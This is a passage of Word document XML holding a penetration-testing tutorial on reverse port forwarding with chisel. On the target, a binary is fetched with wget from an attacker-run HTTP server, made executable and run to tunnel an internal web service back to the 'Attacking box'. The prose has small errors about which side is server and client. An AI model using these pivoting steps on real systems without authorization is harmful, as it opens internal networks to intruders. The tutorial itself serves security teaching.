        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>apt install chisel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E71940C" w14:textId="3EE278B0"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F4A74D" wp14:editId="0A0A0EB2">
            <wp:extent cx="4107180" cy="1722120"/>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07180" cy="1722120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="064945B6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Local port forwarding Example – 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404172E" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA2529" w14:textId="6303664D"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C33AB8" wp14:editId="79C0582B">
            <wp:extent cx="4914900" cy="8610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14900" cy="861060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="767093D9" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Once our Chisel server is ready and reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled, we will be required to transfer a chisel binary to the remote host. The chisel binaries can be downloaded from the official repository based on the system architecture. All the latest available binaries can be found by accessing the releases tab. As we will test it on a Linux system with AMD64 architecture, we selected the highlighted one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4D2B5" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Download link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/jpillora/chisel/releases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="007452BC" w14:textId="5F5DFE0B"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B08787" wp14:editId="2AFA4CB8">
            <wp:extent cx="5731510" cy="463613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4636135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="099695C5" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will unzip the file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> utility. As mentioned earlier, we require to transfer it to the target system to set up a chisel as a client. To transfer the file, we set up a python server in our local system, which will host our file on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC6521" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gitclone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-c0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="9999AA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//github.com/jpillora/chisel.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0A208" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> chisel_1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7_linux_amd64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214D285" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCE1F9" w14:textId="5D5B58BB"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4C01FC" wp14:editId="35FD9C20">
            <wp:extent cx="4770120" cy="24307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70120" cy="2430780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD60D5C" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>We downloaded the chisel binary in the remote host’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> directory, where everyone has full permission on files. Then we give full permission to file so we can execute it. Suppose we do not give appropriate permission to file. In that case, we cannot execute it as it is set only to read permission when we download anything in the temp directory as a low-privileged user. To establish a remote connection, we require a chisel server and a chisel client where the chisel server is the Attacking box, and the chisel server will be the target machine. As we have already set up a chisel server on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>port 5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> earlier, we are establishing a connection with the server. In this example, we mentioned chisel as a client and gave the server IP address and port number (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>). We then mentioned an accessing port (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) and localhost with a port where HTTP service is hosted internally in the remote system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB7596" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>205</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ chisel_1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616ADC5F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> chisel_1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B952365" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./chisel_1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7_linux_amd64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> R:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:localhost:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BAF57" w14:textId="13CF01B3"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF50660" wp14:editId="6BD98BA4">
            <wp:extent cx="5731510" cy="177482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1774825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B024152" w14:textId="330871AF"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350264F2" wp14:editId="6D78169D">
            <wp:extent cx="4792980" cy="1859280"/>
            <wp:effectExtent l="0" t="0" r="762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92980" cy="1859280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090C0C7" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
